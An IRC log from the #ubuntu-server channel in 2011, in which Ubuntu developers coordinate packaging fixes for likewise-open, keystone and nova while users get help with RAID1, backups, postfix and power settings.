<uvirtbot> Launchpad bug 854971 in likewise-open "likewise-open package missing libnpfs" [High,Confirmed] https://launchpad.net/bugs/854971
<jamespage> patch from upstream - trying it now
<jamespage> but looking OK
<pyro_killer> http://bildr.no/view/986071
<pyro_killer> are there any well known programs that restrict it, cause it has happened before
<Daviey> jamespage: you rock star
<JanC> pyro_killer: did you try downloading from your server from multiple locations?
<Daviey> jamespage: Whilst you are here, remember we talked about jenkins testing via juju for daily testing of openstack?
<pyro_killer> yes, my buddies also get it when they download files from it
<SpamapS> lynxman: I'm a little confused by that. Are you saying that the FK's basically just weren't happening before, because it was on a MyISAM table?
<Daviey> jamespage: - That was blocked on complex testing blueprint, and juju / orchestra being 'ready', right?
<pyro_killer> the cap is usually 80-30kbps
<pyro_killer> *kBps
<lynxman> SpamapS: no, it's an InnoDB constraint
<jamespage> Daviey: I do remember
<jamespage> and I have done some work on that
<jamespage> as I have failed todo for the last week (At least)
<jamespage> I need to spend time with the latest versions of adam_g's formulas
<jamespage> and get them working with the formula test service
<jamespage> and get them working with the formula test charm
<jamespage> tomorrow
<SpamapS> lynxman: But FK's don't do *anything* on any other engine
<SpamapS> lynxman: so its a bug in whatever was creating the FK
<lynxman> SpamapS: still it's an InnoDB requirement according to the manual *shrug*
<JanC> pyro_killer: does the same issue happen with ssh/sftp?
<lynxman> SpamapS: exactly, it's a bug in keystone :)
<SpamapS> lynxman: ok, just making sure. :)
<Daviey> jamespage: Great!
<Daviey> jamespage: Now go home. :)
 * SpamapS wishes MyISAM would contact Dr. Conrad Murphy for some sleeping medication...
<jamespage> Daviey: will do once I've done limited testing on likewise-open
<pyro_killer> ssh, works but is really slow, to my eyes it seems like a security feature, we can be several people downloading slowly from it, so that it goes pretty fast in total, but we both get individually low speeds, even if we are alone
<pyro_killer> connecting to the server
<pyro_killer> ssh is not really slow slow, but there are small amounts of info
<pyro_killer> so you dont really notice
<jamespage> Daviey: heck it builds, installs and starts without error - good enought for me
<jamespage> and one step further that it does ATM
<JanC> pyro_killer: that's why I referred to sftp (or you could use scp instead), which transfers files over an ssh link, so causes more traffic  âº
<JanC> pyro_killer: did you ask your hosting provider?
<JanC> pyro_killer: because they might be doing this...
<pyro_killer> i have asked them, but a similar ubuntu server with only tiny amount of programs performs extremely well, my 5$ vps can download to me with 2MBps, so i dont think it is the case, they are on the same node
<Daviey> jamespage: If it compiles, ship it
<jamespage> Daviey, zul: https://code.launchpad.net/~james-page/ubuntu/oneiric/likewise-open/make-it-work/+merge/77390
<jamespage> I'll let you fight over it :-)
<zul> jamespage: beer me :)
<jamespage> can't upload - not in the ubuntu-server packageset
<zul> Daviey: can you take care of it so i can work on this nova bug i been working on?
<Daviey> jamespage: Grrrrrr
<Daviey> jamespage: I wish you were core-dev
<Daviey> :)
<Daviey> smoser: errr.
<smoser> whats up?
<Daviey> smoser: m1.small only has 2GB disks?
<smoser> where do you see that?
<Daviey> smoser: canonistakc
<smoser> i think you're seeing bug 836759
<uvirtbot> Launchpad bug 836759 in nova "nova does not grow qcow disk images correctly" [Medium,Fix released] https://launchpad.net/bugs/836759
<Daviey> smoser: ah, thanks
<smoser> i'm going to wipe all my images and start with new ones
<smoser> to clear any cache issues on nodes
<Daviey> sure
<smoser> and, i guess in the process test how well the cache cleaning works to avoid a disk full :)
<Daviey> :D
<Daviey> adam_g: did you see https://bugs.launchpad.net/ubuntu/+source/cobbler-enlist/+bug/860492 ? happy days :)
<uvirtbot> Launchpad bug 860492 in cobbler-enlist "[MIR] cobbler-enlist src, cobbler-enlist-udeb bin" [High,In progress]
<adam_g> Daviey: neat
<Daviey> adam_g: I assume you didn't read the recommendations then?
<adam_g> Daviey: hah i just did
<adam_g> Daviey: and seems reasonable.
<adam_g> Daviey: when would the deadline for that be?
<Daviey> reasonable yes.. frustrating also :)
<Daviey> adam_g: august 11th
<Daviey> :)
<Daviey> As each day passes, harder and harder to justify.
<Loopzle> Hello, I have setup a Ubuntu Server (10.10) on my old laptop. However, it seems to sleep if I leave it a while. How can I stop it from doing this?
<genii-around> Loopzle: Maybe check your default settings in /etc/default/acpi-support
<Loopzle> genii-around: /etc/default/acpi-support seems to be empty.
<smoser> hallyn, i'm reproducibly hitting that cgroups issue
<smoser> with nova lxc
<genii-around> Loopzle: Does /etc/default/acpid exist?
<Loopzle> genii-around: Yes.
<genii-around> Loopzle: I would suggest to install acpi-support package, then tweak the /etc/default/acpi-support values for hibernate, sleep, and so on
<hallyn> smoser: build a libvirt with my debdiff...
<smoser> where?
<Loopzle> genii-around: I have installed the package, Do I just comment out the lines "ACPI_SLEEP=true" and "ACPI_HIBERNATE=true" or change them to false?
<hallyn> smoser: bottom of bug 842845.  i can push some .debs to pcc if you like
<uvirtbot> Launchpad bug 842845 in nova "problems starting multiple lxc instances concurrently" [High,In progress] https://launchpad.net/bugs/842845
<genii-around> Loopzle: Change them explicitly
<smoser> hallyn i will try
<Loopzle> genii-around: Okay, I will leave the server a while and see if it works. Thanks.
<hallyn> smoser: http://people.canonical.com/~serge/nova-lxc-cgroup-race  has the debs
<smoser> then why did you tell me to build one
<smoser> :)
<hallyn> smoser: i forgot i had them handy
<smoser> pfooey
<hallyn> and i was hoping to get you to look at the patch and comment :)
<smoser> i'm on i386 at the moment.
<hallyn> doh
<genii-around> Loopzle: No prob. Keep us updated!
<raubvogel> When you are setting up isc bind, how do you tell it to try the dns above it if it does not know the answer?
<lynxman> smoser: ping
<lynxman> smoser: silly question, but you sure know it :)
<smoser> k
<lynxman> smoser: I'm dealing with rabbitmq-server 2.6.1, so far up to 2.5.0 we had the daemon bg with & and then rabbitmqctl wait would wait for the listener to be up, so that helped control the up situation
<lynxman> smoser: problem with 2.6.1 is that it expected the PID as well, which doesn't show up through pidof and it's quite hard to get, but then I'll always go okay which in restart can be a bit of a pain
<lynxman> smoser: don't want to go sleep N since it's lame, so I thought you would have a better idea :)
<smoser> "it expected the PID"
<smoser> what expected the pid ?
<smoser> and why doesnt it show up through pidof ?
<lynxman> smoser: because we call the daemon who goes "erlang programname parameters" so it's not easy to trace
<lynxman> smoser: the PID is not expected by the command "rabbitmqctl wait" where before it just went and looked at the socket
<lynxman> smoser: if you install rabbitmq-server 2.5.0 (the oneiric one)
<lynxman> smoser: you'll see the init.d file, I'm talking about
<Daviey> jdstrand: Is this enough of a warning? http://pb.daviey.com/Hz6i/
<jdstrand> Daviey: yeah, looks good
<Daviey> jdstrand: the error checking, is that something you really want to see for O?
<Daviey> Is it something that can be targeted post MIR?
<jdstrand> Daviey: my review isn't done yet. ideally, yes, cause failure to allocate memory and continuing on can be an issue
<jdstrand> I gotta run now though
<Daviey> jdstrand: Would dropping the universe package pass this?
<Daviey> jdstrand: I mean, allocating memory in a volatile enviroment that run for ~30 seconds, then system halts.
<Daviey> jdstrand: ok
<Loopzle> genii-around: I think sleep is disabled, thanks for that. :)
<genii-around> Loopzle: You're welcome.
<bookpage> can i use d3d on a virtualised ubuntu image with vnc?
<Daviey> m_3: How did you get on?
<Pici> bookpage: I don't understand the question.
<m_3> Daviey: just about to ping you
<DrNick__> i'd imagine he's asking if he can use direct3d over vnc on a virtualised image.  i'd say try it, nothing to loose, but I'd say unlikelt
<m_3> so I think the answer is to revert two deps back to the 2.3.11 versions instead of the 2.3.14
<DrNick__> * unlikely
<m_3> I've never seen things work without all of those lib versions matching exactly
<m_3> Daviey: I think it'll be necessary to rebuild the master ruby-rails-2.3 package to lock the deps too (no >=)
<savid> So, it appears my mysql client was built with EditLine.   Is there any easy way to restore readline functionality?
<savid> This is ubuntu 9.10
<m_3> Daviey: I take that back... no need to rebuild the ruby-rails-2.3 base package,
<m_3> just pull ruby-activesupport-2.3 and ruby-activeresource-2.3 back to 2.3.11
<Daviey> m_3: pull them back?
<Daviey> m_3: ahhhhhhh
<Daviey> m_3: rails is 2.3.14.1
<Daviey> m_3: How viable is it to push forward?
<m_3> yikes, but ruby-rails-2.3 is 2.3.11
<m_3> rails-2.3.14.1 looks like a wrapper
<Daviey> m_3: ruby-rails-2.3 is worse than that...
<m_3> Daviey: how much time do we have?
<Daviey> m_3: source package is 2.3.14-3, but it failed to build
<m_3> quicker to revert if possible... can push other libs forward, but it might take a bit
<Daviey> m_3: reverting is hard, we have to butcher the version to appear to be higher
<m_3> I get rails-2.3.14.1 source
<Daviey> It's really quite ugly.
<m_3> ah, I gotcha
<m_3> ok, lemme look at what's changed between 2.3.11 and 2.3.14 for the other libs
<Daviey> m_3: ruby-rails-2.3 failed to build because:
<Daviey>  ruby-actionpack-2.3 : Depends: ruby-activesupport-2.3 (< 2.3.11.1) but 2.3.14-2 is to be installed
<Daviey>  ruby-activerecord-2.3 : Depends: ruby-activesupport-2.3 (< 2.3.11.1) but 2.3.14-2 is to be installed
<Daviey> so if ruby-activesupport-2.3 is upgraded, we might be ok
<m_3> how are you getting 2.3.14.3 source for ruby-rails-2.3
<m_3> I'm getting 2.3.11
<m_3> (I'm just doing an apt-get source ruby-rails-2.3)
<Daviey> $ rmadison ruby-rails-2.3
<Daviey> ruby-rails-2.3 |   2.3.11-1 | oneiric/universe | all
<Daviey> ruby-rails-2.3 |   2.3.14-2 | oneiric/universe | source
<m_3> (sorry, relative noob at packaging)
<Daviey> m_3: pull-lp-source ruby-rails-2.3 , is what the cool kids use.
<Daviey> or the super cool kids, bzr branch lp:ubuntu/ruby-rails-2.3
<m_3> cool.. when do you need this done?
<SpamapS> Daviey: super duper cool kids use bzr branch ubuntu:ruby-rails-2.3
<m_3> I won't even mention the level of coolness that uses 'git bzr clone ubuntu:ruby-rails-2.3'
<m_3> damn... debuild isn't gonna work with that huh
<Daviey> SpamapS: I'm not than cool, probably never will be :)
<Daviey> m_3: Really soon. :)
<Daviey> m_3: "bzr bd -S" ~= debuild -S
<Daviey> negronjl: Your keystone change, are you sure it doesn't need a database migration for upgrades?
<negronjl> Daviey, it shouldn't need it.. the changes make the FKs more flexible and would work on both MyISAM as well as InnoDB
<Daviey> negronjl: sure changing Integer -> String isn't a big deal?
<Daviey> not for fresh installs, just upgrades
<negronjl> Daviey, furthermore, it makes more sense to use same type of fields when doing FKs.  The type ( Integer or String ) is up for debate.  The current package that we have could go either way.  If/when we pull again from upstream, that decision can be made there.  At that point, some sort of sanity check should be done on the DB to accommodate for any changes in field types
<lynxman> negronjl: don't think there's much debate, one is varchar because it might accept UUIDs so... varchar it is
<Daviey> negronjl: Oh, i don't disagree that this looks like a worthy fix - what concerns me, is that i don't know how this is handled for people already witha  keystone database
<negronjl> Daviey, lynxman: I agree with lynxman on the varchar/integer.  Furthermore, the existing databases would not be affected in creation.  keystone would not try to create tables as it checks before and, the conversion between integer/varchar should be transparent via sqlalchemy
<lynxman> Daviey: don't think it does affect anyone really :)
<Daviey> Hmm
<Daviey> negronjl: I assume you tried it?
<Daviey> and upgrade, i mean
<negronjl> Daviey, I really can't try it because keystone will not properly work with InnoDB ( hence the change ).  I can ( and am in the process of ) manually test adding data to the tables in both integer and string and test the conversion .
<Daviey> negronjl: you are a rock star
<lynxman> Daviey: he is
<negronjl> Daviey, changing from integer to varchar is handled as integers can be saved as varchar (Strings).
<Daviey> negronjl: so we are dandy?
<negronjl> Daviey, we are
<kirkland> mtaylor: ping
<kirkland> mtaylor: minor fix to keystone packaging in lp:~kirkland/keystone/copyright-fixes
<kirkland> mtaylor: could you please merge that into lp:~openstack-ubuntu-packagers/keystone ?
<Daviey> negronjl: thanks
<negronjl> Daviey, no worries.
 * Daviey throws kirkland  lp:~ubuntu-server-dev/keystone/diablo .
<bookpage> Pici: DrNick__ was right, that's what I wanted to do. I did try it, but I ran into issues related to having no $DISPLAY :/
<kirkland> Daviey: can i push there?
<kirkland> Daviey: thanks!  pushed
<Daviey> cool
<Daviey> kirkland / negronjl / lynxman / iamfuzztoo: Is bug 843058 going to cause woe?
<uvirtbot> Launchpad bug 843058 in keystone "EC2 compatibility middleware" [High,Confirmed] https://launchpad.net/bugs/843058
<negronjl> Daviey, checking now....
<negronjl> Daviey, it may for us this late in the game.
<lynxman> definitely late
<negronjl> Daviey, the request is not a bad one but, the implementation may end up breaking things that could heavily affect our current openstack deployment ( what we are currently working on our sprint now )
<uvirtbot> New bug: #353301 in eucalyptus/1.5 "concurrent snapshot creation failure" [High,Fix released] https://launchpad.net/bugs/353301
<Daviey> negronjl: yeah, it's not clear to me if keystone supports EC2 based on that bug. :/
<Daviey> There is some support, but NFI how good it is. :/
<negronjl> Daviey, from what little information is available, it isn't
<lynxman> Daviey: support is limited to "someone actually wanting to support the API"
<lynxman> Daviey: so by default no
<Daviey> :'(
<lynxman> Daviey: yeah, sad face too
<m_3> Daviey: I'm gonna step away for food... I'll shoot to have you branches in a few hours.  I'm not seeing anything in the way atm
<blaenk> hey guys, I'm on 9.10 server and it has vim 7.2, wondering how I can upgrade to 7.3, or should I just install from source?
<TheEvilPhoenix> !9.10
<ubottu> Ubuntu 9.10 (Karmic Koala) was the eleventh release of Ubuntu. !End-Of-Life on April 29th 2011, see http://goo.gl/UUTAB for details.
<TheEvilPhoenix> blaenk:  i assume upgrading isnt an option?
<blaenk> TheEvilPhoenix: not at the moment unfortunately, but hopefully soon
<TheEvilPhoenix> well 9.10 is end of life already
<TheEvilPhoenix> so...
<blaenk> so I guess I'll install from sources
<TheEvilPhoenix> well vim is 7.3 in natty
<TheEvilPhoenix> but not before
<TheEvilPhoenix> so if you *absolutely* need 7.3, sources
<soren> smoser: Sorry, which chown?
<smoser> in nova-common postinst
<smoser> we do a chonw -R nova:nova /var/lib/nova/
<smoser> that is going to change perms on files that libvirt had modified to it and possibly other things.
<soren> smoser: Ah.
<soren> smoser: I thought it only did that for fresh installs.
<smoser> i supposed that that was the intent.
<smoser> it turns out that we're in the position where we really *should* do some chowning on upgrade now, to fix old perms that were in place.
<pukeko_> Hi all - i'm installing a JEOS base image for VM guests, in the software selection window, what does the Basic Ubuntu Server option refer to ?
<pukeko_> if i elect to leave that out how much smaller will the img be ?
#ubuntu-server 2011-09-29
<uvirtbot> New bug: #861866 in cloud-init "cloud-init-nonet does not wait for dhcp" [Medium,Triaged] https://launchpad.net/bugs/861866
<padhu> courier imap gives error as 'impad: chroot /root/Maildir unable to access permission denied' and squirrel mail unable to login with 'IMAP service barred login'
<padhu> How can i rectify this ^^^
<zul> kirkland: you are missing two patches in the bzr branch for ubuntu-server-dev
<negronjl> adam_g: ping
<negronjl> adam_g: updated keystone ( minor changes ). pull when you get a chance
<adam_g> negronjl: cool. was just lookin at that a minute ago
<adam_g> negronjl: did your patch get merged to keystone upstream? im still hitting similar issues even with that one column converted
<negronjl> adam_g: I think it did but, the charm has an ugly hack that checks for that code and patches it if needed.
<negronjl> adam_g, what issues are you getting ?
<adam_g> negronjl: yah i saw the patch in the formula
<adam_g> negronjl: one sec
<adam_g> negronjl: actually i lost the juju environment.
<negronjl> adam_g, I'm testing on my side as well
<negronjl> adam_g, I am currently deploying mysql, then keystone.
<adam_g> negronjl: i was basically creating a user, a tenant(i think?) and granting admin to the user (as is outlined in the howto doc)
<negronjl> adam_g, keystone deploys it's own version of mysql but, you can also add a relation to an existing mysql
<negronjl> adam_g, keystone-manage tenant add <insert_name_here>
<negronjl> adam_g, will report back on how it goes on my side.
<negronjl> adam_g, are you using the local version of mysql or a relation to the external mysql
<negronjl> ?
<adam_g> negronjl: no, an external mysql. tested with innodb and myisam
<negronjl> adam_g, cool.  same here
<adam_g> ive run into issues with foreign keys, myisam v innodb and nova's sqlalchemy migrations
<negronjl> adam_g, are you using the openstack.yaml file that I included in the branch ?
<adam_g> negronjl: yea, db access is fine. ive been dropping the database, reconfiguring storage engine, remigrating, etc.
<adam_g> negronjl: anyway gotta run for the day, talk to you tomorrow
<robo> hello: ubuntu 10.04LTS uses apache 2.2.14. Security scanners report this version of apache as exploitable. Since Lucid is backported we can assume as long as the latest patch is installed it's indeed not exploitable correct?  .
<robo> Part 2. If so, is there a plugin that can be used for security scanners? I know centos has something similiar
<twb> No.
<twb> If you want to know if a CVE fix has been backported, read /usr/share/doc/foo/changelog.Debian.gz
<TheEvilPhoenix> ^
<twb> *Often* important vulnerabilities are patched, but not alway.
<robo> gotcha, ty
<twb> Also note that these security patches are backported in lucid-security -- lucid-backports is for new upstream versions.
<robo> let me check that out
<twb> !USN
<ubottu> usn is Please see http://www.ubuntu.com/usn for information about Ubuntu security updates.
<qman__> keep in mind also that vulnerabilities can be patched without upgrading the mainstream version
<qman__> e.g. apache-2.2.14-ubuntu3 might have patches that mainstream apache fixes in 2.2.15
<kees> robo: yeah, see https://wiki.ubuntu.com/SecurityTeam/FAQ#Versions
<qman__> you have to read the changelogs or test for yourself to know whether the holes have been closed or not
<qman__> however it is generally safe to assume that vulnerabilities in commonly used packages in currently supported releases are patched within a reasonable amount of time
<qman__> no guarantees but the track record is pretty good
<twb> qman__: I think that assumption is optimistic
<twb> If I actually had OpenVAS running, I would look through its report and for any scary-looking CVEs, check them in changelog.Debian
<qman__> a fair point, but it really depends on your profile
<qman__> for most people, it's good enough, but if you're an enticing target, you have to be more careful
<qman__> the skiddies have plenty of much easier targets to go for
<twb> s/enticing target/paranoid/
<twb> If you don't have bear traps in your air ducts, you aren't doing your job as sysadmin
<qman__> nothing wrong with that approach
<qman__> no such thing as too much precaution
<twb> qman__: proactively killing users to prevent them leaking secrets?
<twb> I guess intel agencies do that, so it's not wrong per se
<qman__> heh
<twb> Speaking of which, I should put honeypots back on my todo list
<twb> I think I dismissed them last time because I couldn't think of a reliable way to have a honeypot that nothing could escape *and* be able to get the list of attackers out of it
<twb> (Other than, you know, sneakernet)
<ivoks> hallyn: why is bug 861547 low? :)
<uvirtbot> Launchpad bug 861547 in nova "/usr/sbin/ietadm is missing in /etc/sudoers.d/nova_sudoers" [Low,New] https://launchpad.net/bugs/861547
<ivoks> hallyn: it makes nova-volume unusable
<Daviey> ivoks: have you read the status defintions?
<ivoks> Daviey: status definitions?
<Daviey> ivoks: Err, Importance - rather
<_ruben> anyone ever ran into $ARCH being amd64 instead of x86_64 when trying to build an out of tree kmod?
<ivoks> Daviey: i was unaware of any changes; i've been too long tied to different definitions
<Daviey> ivoks: Whilst i agree it could have been a medium, the triager was correct with Low - "A bug that has an easy work-around"
<ivoks> Daviey: ok, thanks for explanation
<ivoks> hallyn: ignore my question ;)
<Daviey> ivoks: fancy adding d/changelog entries?
<Daviey> leave it marked as UNRELEASED
<ivoks> Daviey: sure, i just have to finish some other work
<uvirtbot> New bug: #862064 in samba (main) "package samba-common 2:3.4.7~dfsg-1ubuntu3.7 failed to install/upgrade: subprocess installed post-installation script returned error exit status 10" [Undecided,New] https://launchpad.net/bugs/862064
<Daviey> jamespage: Your likewise-open upload did also fix bug 655533, right?\
<uvirtbot> Launchpad bug 655533 in likewise-open "[master] package likewise-open 5.4.0.42111-2ubuntu2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [High,Confirmed] https://launchpad.net/bugs/655533
<jasonmsp> hey all.  Can someone tell me what I can do to get the file names to print out before they are displayed when I do this?  find . | xargs -n1 grep -ils loglevel | xargs -n1 -I {} head {}  ?
<Kartagis> hello
<Kartagis> do I need to import a database schema for postfix mysql support?
<ikonia> Kartagis: no
<ikonia> Kartagis: the installer for mysql comes with the default schema
<ikonia> the postfix one comes with an "empty" schema if that makes sense
<jasonmsp> Anyone know what to do when you cat a file and your encoding or something changes?  This is my prompt after I hit cat on a file:  Tâ¤â¤ Sââ» 29 03:46:09
<jasonmsp> /â½â¼â´/â¬â¬â¬/ââ¼â¼16/ââºâ½ââââºâ¤â¼â¼ââ¤.ââºâ/â»â¤âââââ®â¤âââ
<twb> jasonmsp: reset
<ikonia> tput -reset
<jasonmsp> thanks!
<twb> no -
<jasonmsp> no for which?
<ikonia> no - he means
<jasonmsp> ah.. thanks..
<ikonia> thank you twb
<brontosaurusrex> would this http://www.pcpro.co.uk/reviews/servers/364444/hp-proliant-microserver be a decent platform for ftp/www/file sharing server, using 2nd disk as mirror or rsync redundancy, running ubuntu server of course?
<brontosaurusrex> thoughts?
<Daviey> brontosaurusrex: Ubuntu UK Podcast did a review of it, you could do worse than listen to that.
<Daviey> brontosaurusrex: or ask popey.. he has at least one.
<brontosaurusrex> Daviey, tnx, let me google
<Kartagis> ikonia: do I create the table manually then?
<ikonia> Kartagis: what table ? what are you trying to do (little bit of background please)
<Kartagis> ikonia: I'm trying to have postfix work with mysql
<ikonia> Kartagis: you'll need to create the database for that manually, or use a software package that creates them for you as part of the install
<ikonia> Kartagis: you'll also need to make sure your postfix install was built with mysql compatability linked in, I don't know if it does it native or links against the mysql client
<ikonia> I think it's against the client
<twb> brontosaurusrex: I haven't used proliants, but I get the impression they're reasonably good tier1.5 gear
<twb> I did hear one horror story where their smart PSUs sent bad juju back down the power line and caused the UPS to turn off everything whenever you plugged a proliant into it, tho
<brontosaurusrex> twb, any suggestions on how to go with mirroring? is raid1 really the best option? or would a croned rsync do better?
<twb> That depends what you want
<brontosaurusrex> well, basically a constant uptime with all the files and all the functionality :)
<twb> Here, we have three-way RAID1 on the local system, combined with offsite backups using rsync + cp -al to create incremental snapshots.
<twb> brontosaurusrex: you aren't going to get constant uptime
<twb> You will be lucky to get five-nines with LTS on a proliant
<brontosaurusrex> ok, near-constant uptime, basically redundancy, something that people can trust to store their master videos as well, not just intranet proxies
<twb> What risks are you guarding against?
<brontosaurusrex> harddrive crash
<twb> A disk dying?  The RAID controller dying?  The building burning down?  The user accidentally rm -rf'ing?
<twb> If you're only concerned about the first, a two-way RAID1 will suffice
<brontosaurusrex> yeah, basically against hd crash and silly admins risk (against myself)
<brontosaurusrex> how is raid1 agains silly admins?
<twb> What do you mean "silly admins" ?
<jamespage> Daviey: I think so - I need to re-install and re-test the upgrade again when we have something that actually might work
<brontosaurusrex> rm -r
<twb> brontosaurusrex: zero safety
<twb> brontosaurusrex: RAID1 won't help against that *at all*
<brontosaurusrex> so rsync is better i guess?
<Daviey> jamespage: I might test it in a natty cloud image.
<jamespage> yes - not a bad idea
<Daviey> ( jamespage: morning btw )
<jamespage> Daviey: good morning to you as well!
<twb> brontosaurusrex: like I say, I have local RAID1 and offsite rsync+cp -al
<twb> ZFS or BTRFS snapshots are better than cp -al, but they're also a pain
<brontosaurusrex> offsite like over intranet or external drives or ... ?
<Daviey> brontosaurusrex: If you have silly admins, you are probably doing it wrong :)
<brontosaurusrex> Daviey, well, my current server has 120 days of uptime, but the fact that there is no redundancy makes me nervous
<twb> brontosaurusrex: either over the internet, or over intranet to the other end of the site for large campuses, or to removable USB HDDs that the user is responsible for rotating
<brontosaurusrex> twb, ok
<twb> rotation is bad because then the user can forget
<brontosaurusrex> of course, i need a "no admininstration" needed system
<uvirtbot> New bug: #862129 in samba (main) "package samba 2:3.5.8~dfsg-1ubuntu2.3 failed to install/upgrade: subprocess new post-removal script returned error exit status 2" [Undecided,New] https://launchpad.net/bugs/862129
<twb> You mentioned videos; rsync of videos over internet is gonna be painful
<ersi> brontosaurusrex: Offsite is always Off site.
<ersi> brontosaurusrex: Otherwise, it isn't offsite :)
<twb> For stuff like maildirs and office docs, it is fine
<twb> pst files completely rape rsync, tho
<brontosaurusrex> twb, then it will be an usb disk that always on?
<brontosaurusrex> lol
<twb> brontosaurusrex: you'd arrange it such that the USB disks automount, and one is always onsite and one or more are in transit / offsite
<brontosaurusrex> yes, the videos can be in Gb
<twb> e.g. you say to the user "every friday, bring disk A in and take disk B home, and vice-versa every other friday "
<twb> Personally I really hate that design
<acemo> all tutorials/documentation n stuff says i have to first tell mdadm i'm going to remove my faulty disk before i can actually remove it.
<brontosaurusrex> twb, sounds good, so this can be easily automated in a way that the rsync will see any usb disk with the same path and everything i guess?
<twb> acemo: well, no, you can just yank it out and it'll be as if the disk exploded while it was in there
<twb> brontosaurusrex: udev can handle the mounting
<twb> brontosaurusrex: give all USB HDDs the same filesystem label (tune2fs -l)
<acemo> I didn't do that and now my new hard disk is seen as a spare disk. Is there any way i can tell mdadm that the removed disk is actually gone?
<brontosaurusrex> hrmm, yeah, how about rsyncs to a win/mac workstations overnight?
<twb> acemo: so activate it
<twb> acemo: madadm --add /dev/md0 /dev/sdz1 or whatever
<twb> brontosaurusrex: you cannot back up windows machines
<twb> They have no inodes, so it is impossible without specialist Windows backup tools
<brontosaurusrex> no, just the file transfer of files to windows machine
<twb> I don't follow
<acemo> twb thats what i did and then it became spare..
<brontosaurusrex> well, the editing workstations are either: win, mac or linux, server is ubuntu, so can i use an editing workstation overnight as a rsync target?
<brontosaurusrex> or something similar
<twb> acemo: I don't remember what to do next, RTFM, sorry
<twb> brontosaurusrex: I *really* wouldn't rely on Windows for anything important
<twb> brontosaurusrex: apart from anythign else, rsync over the wire will need SSH and rsync installed on the Windows box, so you'll need cwrsync or full cygwin
<brontosaurusrex> right, so OS X would be much easier as a target?
<twb> Well, it's a fucked-up 80s vendor wars-style unix
<twb> But at least it isn't VMS like NT7.1
<acemo> twb: been reading the manual and random tutorials for a few hours already.. haven't found anything yet.. oh well.. back to searching :)
<brontosaurusrex> so what if i upgrade this existing server with some new HDs and get proliant as a backup server?
<twb> acemo: raid1 or raid5
<acemo> twb: raid 1
<twb> All I can see is mdadm /dev/md0 --add /dev/sdz
<acemo> same here.. thats what pretty much everything on the internet says
<twb> pastebin mdadm --detail output
<acemo> twb: http://pastie.org/private/q4rhmkssc6qhq1s94oeaq
<twb> And /proc/mdstat ?
<twb> What *I* think is that you've successfully added it, and it'll stop being a spare automatically when the resync finishes
<acemo> /proc/mdstat http://pastie.org/private/xruou3g5ets1askaro5bmw
<acemo> thats what i was asuming myself too..
<twb> BTW, recommend you enable write-intent bitmaps
<twb> They're the RAID equivalent of a filesystem journal
<twb> (-binternal on --assemble/--grow)
<acemo> unfortunately as soon as its done it will show the removed disk again..
<acemo> atleast thats what it did the last time
<twb> acemo: hm, I can't explain that
<twb> acemo: unless the new disk is too small or something?
<acemo> thanks for the tip, i'll enable that when its done
<twb> Check /proc/partitions
<acemo> /proc/partitions http://pastie.org/private/kvpxql5wonuveqju9egsig
<acemo> their the same size..
<twb> OK
<Daviey> jamespage: Did you have time to reproduce bug 801494, with a sleep()?
<uvirtbot> Launchpad bug 801494 in ubuntu "Multi part LVM layout: system fails to boot due to missing volumes" [High,New] https://launchpad.net/bugs/801494
<Daviey> (/me suspects not!  But thought i should ask)
<jamespage> no
<jamespage> Daviey: no
<acemo> i guess best thing to do is 1) wait for it to be done syncing 2) --grow -binternal 3) hope that somehow its not putting it as spare yet again.
<Daviey> jamespage: Ok.. hopefully jhunt will have a proper fix today, we can test against :)
<Daviey> ikonia: How did you get on with bug 831121 or bug 831179?
<uvirtbot> Launchpad bug 831121 in dovecot-antispam "dovecot-antispam version 1.4~rc3-1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831121
<uvirtbot> Launchpad bug 831179 in dovecot-metadata-plugin "dovecot-metadata-plugin version 0.0.1~hg144-0ubuntu1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831179
<ikonia> Daviey: I'm returing to it at 12:00
<ikonia> let me get the number of the one I'm working on
<ikonia> I've got it building,
<twb> I hate my users
<ikonia> (can only get to the test kit when I'm on a different network
<Daviey> ikonia: rocking!
<twb> I even write .ssh/config rules for them and they still insist on doing things wrong
<ikonia> Daviey: working on 831121
<Daviey> twb: I swear you are the BOFH.
<twb> I am
<Daviey> ikonia: ok, thanks
<ikonia> not touched 831179 as I'm doing one at a time due to limited time/resources
<twb> Daviey: well, not THE BOFH
<twb> Daviey: Simon's a kiwi
<Daviey> twb: :o
<Daviey> ikonia: understood
<twb> Daviey: what?
<Daviey> twb: I still think you re the original BOFH.
<twb> I'm too young for that
<ikonia> too many social skills
<twb> Nah, adult aspys just know how to hide it
<twb> It's all operant conditioning
<ikonia> Daviey: got the assignment - sloppy on process, so please keep me in check, not done much with "official" ubuntu bug fix process
<Daviey> ikonia: heh
<koolhead17> hi all
<Kartagis> http://pastebin.com/8h3WgcfZ <--- what does this mean? what do I need to install?
<Kartagis> if I do
<ikonia> Kartagis: looks like too issues
<ikonia> Kartagis: one the authentication methos is configured to use sasl, which isn't available on your machine, and the second is your postfix startup options are wrong/invalid
<jamespage> Daviey: testing the new version of likewise now
<jamespage> Daviey: do we still get tasksel at the end of the server ISO installer?
<jamespage> I should know but I've not looked recently
<Daviey> jamespage: I thought we dropped it.
<jamespage> Daviey: me to - but I wanted to make sure
<Daviey> Equally, i should know.. but I tend to do the install on autopilot these days
<Daviey> not good.
<jamespage> Daviey: I think that we need to re-align our automated testing for next release
<jamespage> its still focussed around tasksel
<jamespage> which is not that appropriate
<Daviey> jamespage: Hell, yes.
<Daviey> jamespage: It is sounding like we will need to drive the complex-testing blueprint.
<jamespage> Daviey: we should be able to next release
<jamespage> juju will be mature enough
<jamespage> I'm seeing it
<Daviey> jamespage: we should consider if orchestra is the right framework for it, using openstack + iso support might be better.
<jamespage> Daviey: I think so - I don't want to introduce a requirement for real hardware
<Daviey> jamespage: Ah.. without openssh (server) installed by default, we pretty much have to keep tasksel
<jamespage> hmm
<jamespage> gah
<jamespage> OK - but I really want to automate network install testing as well
<jamespage> we can leave what we already have in place and supplement it
<Daviey> Yeah
<jamespage> for example I see several things this release which could do with a good test - tomcat7, mail-stack-delivery, likewise-open
<jamespage> hey - maybe even jenkins
<Daviey> jamespage: I assume you've already put some thought into a blueprint?
<jamespage> I don't think we should be to restrictive
<jamespage> about 5 minutes worth looking at this log
<jamespage> but yes - generally I have
<Daviey> no, it should be easy to write tests.. and for not just stuff we care about.
<Daviey> heh
<jamespage> for simple deployment tests we should prob use preseed + simple test suites
<jamespage> juju for more complicated stuff
<jamespage> but that is likely to need a openstack/or we use ec2
